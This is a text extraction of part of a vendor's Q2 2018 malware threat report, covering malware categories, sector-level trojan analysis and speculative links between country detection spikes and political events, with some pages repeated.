Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
